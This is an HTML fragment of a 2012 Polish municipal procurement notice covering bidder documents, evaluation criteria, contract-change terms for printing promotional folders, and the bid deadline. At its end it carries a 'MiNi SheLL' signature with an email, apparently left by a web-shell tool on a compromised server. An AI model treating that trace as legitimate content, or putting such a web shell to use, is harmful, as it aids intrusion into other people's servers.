<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy zobowiązani są złożyć następujące dokumenty oraz oświadczenia;
1. oświadczenia oraz dokumenty wskazane  w rozdziale 6 specyfikacji, 
2. wypełniony formularz ofertowy  według załącznika nr 1,
W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
3.oświadczenie o części zamówienia, której wykonanie, Wykonawca zamierza powierzyć podwykonawcom 
( w treści formularza ofertowego  pkt 4) w przypadku powierzenia przez Wykonawcę części zamówienia podwykonawcom,
5.pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 23 ustawy (dotyczy również wspólników spółki cywilnej),
6.pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumentów składających się na ofertę nie podpisuje osoba uprawniona do reprezentowania Wykonawcy zgodnie z odpisem z Krajowego Rejestru Sądowego lub Wykonawca - w przypadku osób fizycznych.
Pełnomocnictwo, powinno być przedstawione w formie oryginału lub poświadczonej za zgodność z oryginałem kopii przez osoby wystawiające pełnomocnictwo, notariusza lub osoby, których uprawnienie do reprezentacji 
wynika z dokumentu rejestracyjnego Wykonawcy, zgodnie ze sposobem reprezentacji określonym w tych dokumentach.
Wykonawca ponosi wszystkie koszty związane z przygotowaniem i złożeniem oferty.
Zamawiający zaleca  spięcie na trwałe wszystkich dokumentów, załączenie spisu treści oferty, ułożenie wszystkich wymaganych dokumentów zgodnie z kolejnością podaną w specyfikacji oraz ponumerowanie wszystkich stron oferty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do treści art. 144 ustawy  Zamawiający  przewiduje możliwość  zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku :
a) zmiany ilości folderów promocyjnych - 15.000szt.  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  folderów promocyjnych,  z zastrzeżeniem, że nie mniej niż 1.500szt.
b) zmiany ilości wkładek do folderów - 75.000szt.  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  wkładek,  z zastrzeżeniem, że nie mniej niż 7.500szt.
c) zmiany wynagrodzenia za realizację zadania nr 1 w zakresie  wykonania mniejszej ilości  folderów promocyjnych oraz wkładek do folderów  w sytuacji uzyskania zgody Instytucji Zarządzającej RPO WSL na wykonanie  mniejszej ilości  folderów i wkładek do folderów.
d) zmiany terminu wykonania zamówienia,  w szczególności w przypadku realizacji zadania nr 2 ( z czerwca 2012 na miesiąc wrzesień 2012 ) pod warunkiem podpisania aneksu do umowy o dofinansowanie z Instytucją Zarządzającą  RPO WSL, zmieniającego zasady i terminy  realizacji przedmiotu zamówienia.
e) zmiany wynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT),  stosownie do obowiązującej stawki  podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swietochlowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Zamówień Publicznych   Urząd Miejski Świętochłowice ul. Katowicka 54  pok. 121.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2012 godzina 11:00, miejsce: Wydział  Zamówień Publicznych   Urząd Miejski Świętochłowice ul. Katowicka 54  pok. 121.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com